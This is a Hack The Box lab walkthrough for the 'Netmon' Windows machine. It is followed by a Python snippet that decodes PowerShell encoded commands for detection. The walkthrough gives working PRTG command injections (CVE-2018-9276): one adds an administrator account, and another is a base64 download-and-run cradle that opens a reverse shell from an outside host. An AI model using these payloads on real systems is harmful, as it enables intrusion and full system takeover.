Netmon
18th May 2019 / Document No D19.100.28
Prepared By: MinatoTW
Machine Author: mrb3n
Difficulty: Easy
Classification: Official
Page 1 / 11
SYNOPSIS
Netmon is an easy difficulty Windows box with simple enumeration and exploitation. PRTG is
running, and an FTP server with anonymous access allows reading of PRTG Network Monitor
configuration files. The version of PRTG is vulnerable to RCE which can be exploited to gain a
SYSTEM shell.
● Enumeration
● CVE-2018-9276
ENUMERATION
NMAP
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.152 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -sC -sV -p$ports 10.10.10.152
FTP is open with anonymous access allowed, and the whole C: drive appears to be exposed through it. PRTG
Network Monitor is running on the web server on port 80, alongside other common Windows ports.
FTP
Logging into FTP as anonymous, we find the user flag in the Public folder.
On checking the installed software we find PRTG Network Monitor, which we came across earlier.
A quick Google search yields this information. According to it, PRTG stores its configuration files in
C:\ProgramData\Paessler.
Going into the folder we find the configuration files. According to the documentation, "PRTG
Configuration.dat" and "PRTG Configuration.old" are standard files. However, there is no mention
of "PRTG Configuration.dat.bak".
Scrolling down a bit we find the password for user prtgadmin.
PRTG NETWORK MONITOR
Using the credentials prtgadmin / PrTg@dmin2018 we can now try to log in to the page.
However, the credentials do not work. Perhaps the password was changed after the old
configuration was backed up. Let's follow the pattern and try "PrTg@dmin2019" as the password.
FOOTHOLD
A Google search for PRTG vulnerabilities yields a CVE affecting versions below 18.1.39 (CVE-2018-9276).
According to the referenced article, RCE can be achieved through the notification feature. Let's try exploiting it.
The software by default runs as SYSTEM.
Leave the default fields as they are and scroll down to the "Execute Program" section. We can
add a user to the Administrators group using this parameter:
abc.txt | net user htb abc123! /add ; net localgroup administrators htb /add
Now on the extreme right of your notification name, click on the edit icon and then the bell icon
to trigger it.
psexec.py htb:'abc123!'@10.10.10.152
ALTERNATE WAY
In case we don't want to add a user, for better OPSEC we can get a reverse shell instead. However, due
to HTML encoding, many characters in the parameter get encoded. We can bypass this using PowerShell's
base64-encoded command execution.
We need to create a base64-encoded command. However, it must use the encoding that
Windows uses for this purpose, i.e. UTF-16LE.
echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.16.32/Invoke-PowerShellTcp.ps1')" | iconv -t UTF-16LE | base64 -w0
We use iconv to convert the command to the target encoding. The reverse shell executed is Invoke-PowerShellTcp from Nishang:
download the script and append the invocation command to its last line.
Now start a simple HTTP server and create a new notification. This time the parameter would be:
abc.txt | powershell -enc SQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADMAMgAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQA=
python3 -m http.server 80
And trigger it.
And we have a SYSTEM shell.
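To see what the UTF-16LE/base64 encoding used above actually hides, and how a defender unpacks it when it shows up in a process-creation log, here is an added Python example (not part of the original writeup). It decodes `-EncodedCommand` style arguments from a command line, checks the decoded script for download-and-execute indicators, and shows the inverse of the `iconv -t UTF-16LE | base64 -w0` pipeline. The sample command line is constructed from the notification parameter above; the indicator list is an assumption chosen for this example.

```python
import base64
import re

# Constructed sample: the base64 blob from the notification parameter above, as it
# would appear in the command-line field of a process-creation event.
SAMPLE_CMDLINE = (
    "powershell -enc "
    "SQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA"
    "pAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuAD"
    "EAMAAuADEANgAuADMAMgAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAc"
    "AAuAHAAcwAxACcAKQA="
)

# powershell.exe accepts -ec and any unambiguous prefix of -EncodedCommand
# (-e, -en, -enc, ...), so one alternation covers all spellings, longest first.
_ENC_FLAGS = ["ec"] + ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)]
_ENC_RE = re.compile(
    r"(?:^|\s)[-/](?:"
    + "|".join(sorted(_ENC_FLAGS, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# Assumed indicator list for this example: substrings typical of download-and-execute
# one-liners. A real ruleset would be broader and tuned to the environment.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "invoke-powershelltcp")


def decode_encoded_command(blob: str) -> str:
    """Decode one -EncodedCommand argument: base64 over the script in UTF-16LE.

    The UTF-16LE step is why the blob is full of 'A' characters: every ASCII
    code unit carries a 0x00 high byte, which base64 renders as 'A'-heavy output.
    """
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def encode_command(script: str) -> str:
    """The inverse, equivalent to `echo -n ... | iconv -t UTF-16LE | base64 -w0`."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_commands(cmdline: str) -> list:
    """Return the decoded script for every -enc style argument found in cmdline."""
    decoded = []
    for match in _ENC_RE.finditer(cmdline):
        try:
            decoded.append(decode_encoded_command(match.group(1)))
        except (ValueError, UnicodeDecodeError):
            # Not valid base64/UTF-16LE: some other -e* switch such as
            # -ExecutionPolicy followed by a word, so skip it.
            continue
    return decoded


def indicators_in(script: str) -> list:
    """List the INDICATORS present in a decoded script (case-insensitive)."""
    lowered = script.lower()
    return [indicator for indicator in INDICATORS if indicator in lowered]


def triage(cmdline: str) -> list:
    """Decode every encoded command in cmdline and pair it with its indicators."""
    return [(script, indicators_in(script)) for script in extract_encoded_commands(cmdline)]


if __name__ == "__main__":
    for script, hits in triage(SAMPLE_CMDLINE):
        print("decoded :", script)
        print("hits    :", ", ".join(hits) or "none")
```

Running the block prints the plaintext one-liner that the notification parameter carries and the indicators it matches. Because the decoder only accepts well-formed base64 that also decodes as UTF-16LE, it can be run over every PowerShell command line in a log export without special-casing other `-e` switches.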